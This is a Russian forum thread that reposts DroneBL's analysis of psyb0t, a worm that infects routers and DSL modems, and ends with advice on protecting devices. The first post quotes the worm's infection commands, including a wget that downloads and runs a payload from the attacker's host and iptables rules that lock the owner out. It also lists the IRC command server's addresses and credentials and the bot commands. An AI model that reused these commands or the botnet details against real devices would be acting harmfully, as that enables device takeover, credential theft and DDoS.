Мини-чат

Запрещается мат, реклама в любом её виде, оскорбления. За любое нарушение будет бан или наказание как в чате, так и на форуме.
Загрузка...
Очистить поле ввода
Запрещается мат, флуд, реклама в любом её виде, оскорбления. За любое нарушение будет бан как в чате, так и на форуме.
Основная справка
Чат MGC Chatbox Evo очень легок в использовании
Вы можете:
  1. Отправлять сообщения: введите текст в поле ввода и нажмите Enter, или кнопку OK в чате.
  2. Форматировать сообщения: открыв панель форматирования нажатием кнопки BBCode, вы получаете доступ к различным настройкам форматирования текста ваших сообщений.*
  3. Общаться в разных комнатах: в зависимости от настроек группы пользователей, в которой вы состоите, либо настроек чата вы можете оставлять сообщения в разных комнатах. Выбор комнаты осуществляется нажатием соответствующей кнопки в левой части чата.*
  4. Редактировать свои сообщения (или сообщения других): редактирование осуществляется двойным нажатием на сообщение.*
  5. Использовать команды: команды позволяют пользоваться новыми опциями форматирования, управления и т.д... Информация о доступных вам командах будет расположена ниже. Вы можете не вводить префикс команды (/название_команды) в связанной с ней комнате (исключение составляет основная комната).*
* в зависимости от настроек выбранных администрацией форума для вашей группы.
Показано с 1 по 6 из 6

Тема: Эпидемия вируса для роутеров и DSL-модемов.

  1. #1

    Восклицание Эпидемия вируса для роутеров и DSL-модемов.

    Cерьезную опасность обнаружили администраторы сайта DroneBL. Примерно две недели назад на сайт была совершена DDoS-атака. При расследовании инцидента выяснилось, что атаку производили зараженные роутеры и DSL-модемы. Дальнейший анализ показал, что в Интернете появилась первая ботнет-сеть, которая базируется не на ПК и серверах, а на сетевом оборудовании домашнего уровня. Эта вредоносная сеть вместе с червем, распространяющим заразу, получила название «psyb0t».

    Механизм заражения «psyb0t» оказался довольно необычным. Заражению подвержены любые устройства с маршрутизацией пакетов на базе операционной системы Linux Mipsel, снабженные административным интерфейсом, либо открывающие доступ через службы sshd или telnetd для демилитаризованной зоны DMZ, если у них заданы слабые сочетания имени пользователя и пароля (включая устройства openwrt/dd-wrt). Червь «psyb0t» использует алгоритм подбора имен пользователя и паролей, а также несколько стратегий для перехвата управления устройством.

    После заражения червь «psyb0t» встраивает фрагмент вредоносного кода в операционную систему устройства – в состав червя входят варианты кода для нескольких версий системы Mipsel, они загружаются с центрального сервера злоумышленников. Затем червь закрывает конечному пользователю доступ к устройству по telnet, sshd и через веб-интерфейс, а сам начинает исследовать все проходящие через устройство пакеты, выуживая из них различные имена и пароли. Также червь пересылает своим владельцам информацию о наличии в локальной сети серверов с уязвимыми конфигурациями службы phpMyAdmin и СУБД MySQL. По данным DroneBL, уже сейчас в ботнет-сети насчитывается более 100 тысяч активных зараженных устройств, используемых для похищения частной информации и проведения крупномасштабных DDoS-атак. Особую опасность, по мнению первооткрывателей, представляет то, что большинство домашних пользователей, скорее всего, не смогут заметить присутствия червя «psyb0t» в своей сети.

    Не успело подробное описание червя появиться в блоге DroneBL, как поступила новая информация автора psyb0t. Он уверяет, что написал червя с исследовательскими целями и теперь прекращает дальнейшую работу над ним. Также он уверяет, что сумел захватить порядка 80 000 устройств, но никогда не использовал этот ботнет для DDoS-атак, фишинга или кражи личных данных.

    Примечание paxlo:

    После попадания в систему, сифилис использует следующую стратегию:

    1) Запускает shell через имеющийся CLI.
    cli> shell

    2) Удаляет файл udhcpc.env.
    # rm -f /var/tmp/udhcpc.env

    3) Закачивает эксплоит, сохраняет его вместо удалённого файла и запускает:
    # wget http://dweb.webhop.net/.bb/udhcpc.env -P /var/tmp &&
    chmod +x /var/tmp/udhcpc.env && /var/tmp/udhcpc.env &

    4) В целях собственной безопасности червь использует встроенный в железку firewall (iptables),
    блокируя доступ к портам через которые она управляется (telnet, ssh, web).
    # iptables -A INPUT -p tcp --dport 23 -j DROP
    # iptables -A INPUT -p tcp --dport 22 -j DROP
    # iptables -A INPUT -p tcp --dport 80 -j DROP

    Для управления зараженными устройствами используется протокол IRC.
    После заражения устройство пытается подключится к запаролленому IRC серверу (командный центр) и ждет оттуда инструкций.
    "Командным центром" червя, с которого происходят все запросы на управление бот сетью, является домен strcpy.us.to.

    IP адреса:
    202.71.102.110 (Малайзия)
    202.67.218.33 (Гонг-Конг)
    216.199.217.170 (США)
    207.155.1.5 (США)
    Порт подключения: 5050
    Пароль: $!0@
    Канал: #mipsel
    Ключ: %#8b
    Ник подключившегося начинается на [NIP] далее идет случайня последовательность. Например [NIP]-IBM6N4SKA.

    Теперь злоумышленникам достаточно подать нужную команду в IRC для дальшнейших действий со стороны железок.
    Список наиболее интересных команд:
    .login - залогиниться в ботнете
    .logout - вылогиниться
    .exit - вылогиниться из ботнета и удалиться с железки
    .sh - запустить шелл
    .tlist - вывести список процессов
    .kill - убить процесс
    .killall - убить все текущие процессы
    .silent - перестать посылать данные в канал
    .getip - показать WAN IP бота
    .visit - атаковать URL используя GET запросы
    .scan - сканировать диапазон адресов на потенциальную уязвимость
    .rscan - сканировать CIDR диапазон на потенциальную уязвимость
    .lscan - тоже для что и .scan, но для локальной сети
    .lrscan - тоже для что и .rscan, но для локальной сети
    .sql - сканировать MySQL сервер на на уязвимости
    .pma - сканировать phpMyAdmin на на уязвимости
    .sleep - даёт команду боту приостановить деятельность
    .upgrade - обновить червя с сайта распространителя
    .ver - возвращает версию червя
    .rs - получить обнаруженные логины и ссылки на rapidshare
    .rsgen - сгенерировать ложную рапидную ссылку и отправить пользователю в браузер
    .wget - скачать ссылку
    .r00t - пробовать повысить локальные привилегии до рута используя эксплоит vmsplice
    .sflood - послать SYN пакет на IP
    .uflood - послать UDP пакет на IP
    .iflood - послать ICMP пакет на IP
    .pscan - сканировать порты на указанном IP
    .fscan - подбор паролей на FTP сервисе указанного IP

    Самый простой и действенный метод защиты от данного червя - вернуть устройство к заводским настройкам (HARD RESET), залить последнюю версию прошивки, НИ В КОЕМ СЛУЧАЕ не использовать заводские логин:пароль для администрирования железки, а использовать криптостойкие пароли (желательно более 8 символов, символы A-Z, a-z, 0-9, спецсимволы). Также необходимо по возможности отключить порты 21, 22 и WEB консоль со стороны WAN.

    источник: DroneBL

    0 Not allowed! Not allowed!

  2. # ADS
    ООО "Рекламная реклама"
    Регистрация
    Always
    Сообщений
    Many
     

  3. #2

    По умолчанию

    Самому посчастливилось столкнутся с этим чудом

    0 Not allowed! Not allowed!

  4. #3
    Завсегдатай форума
    Регистрация
    16.01.2009
    Адрес
    Венесуелла, Каракас
    Сообщений
    1,139
    Получено (+/-): 0/0

    По умолчанию

    баян 100500%

    0 Not allowed! Not allowed!

  5. #4
    Java 2 Micro Edition Аватар для j2me
    Регистрация
    23.04.2009
    Адрес
    Северодвинск, Архангельская область: доска, треска и тоска
    Сообщений
    21,879
    Получено (+/-): 413/164

    По умолчанию


    точнее почти 2 года назад

    0 Not allowed! Not allowed!
    Последний раз редактировалось j2me; 09.03.2014 в 17:55.

    ┌─┬───┬───┬───┬───┬───┬───┬───┬───┬───┬─┐
    ├─┴─┬─┴─┬─┴─┬─┴─┬─┴───┴─┬─┴─┬─┴─┬─┴─┬─┴─┤
    ├─┬─┴─┬─┴─┬─┴─┬─┘ бицца └─┬─┴─┬─┴─┬─┴─┬─┤
    ├─┴─┬─┴─┬─┴─┬─┴─┐галавой┌─┴─┬─┴─┬─┴─┬─┴─┤
    ├─┬─┴─┬─┴─┬─┴─┬─┘ здеся └─┬─┴─┬─┴─┬─┴─┬─┤
    ├─┴─┬─┴─┬─┴─┬─┴─┬───┬───┬─┴─┬─┴─┬─┴─┬─┴─┤
    └───┴───┴───┴───┴───┴───┴───┴───┴───┴───┘
    Хвала безумцам. Бунтарям. Смутьянам. Неудачникам.

  6. #5
    Я здесь на ПМЖ Аватар для sale
    Регистрация
    24.01.2010
    Адрес
    Арх,Новск
    Сообщений
    3,865
    Получено (+/-): 383/326

    По умолчанию

    Цитата Сообщение от Silver29 Посмотреть сообщение
    если у них заданы слабые сочетания имени пользователя и пароля
    сами себе злобные буратины

    0 Not allowed! Not allowed!

  7. #6
    Местный Аватар для MicroShop
    Регистрация
    02.01.2011
    Адрес
    Архангельск
    Сообщений
    144
    Получено (+/-): 0/0

    По умолчанию

    куплю модем-роутер

    0 Not allowed! Not allowed!

Похожие темы

  1. Разблокировка 3G модемов
    от ncuxo в разделе Hardware
    Ответов: 3
    Последнее сообщение: 20.06.2010, 00:25
  2. Настройка роутеров NETGEAR
    от Graveworm в разделе Hardware
    Ответов: 0
    Последнее сообщение: 29.01.2010, 11:23
  3. Ответов: 40
    Последнее сообщение: 28.11.2009, 19:57
  4. Ответов: 8
    Последнее сообщение: 11.11.2009, 01:16

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Внести пожертвование на развитие!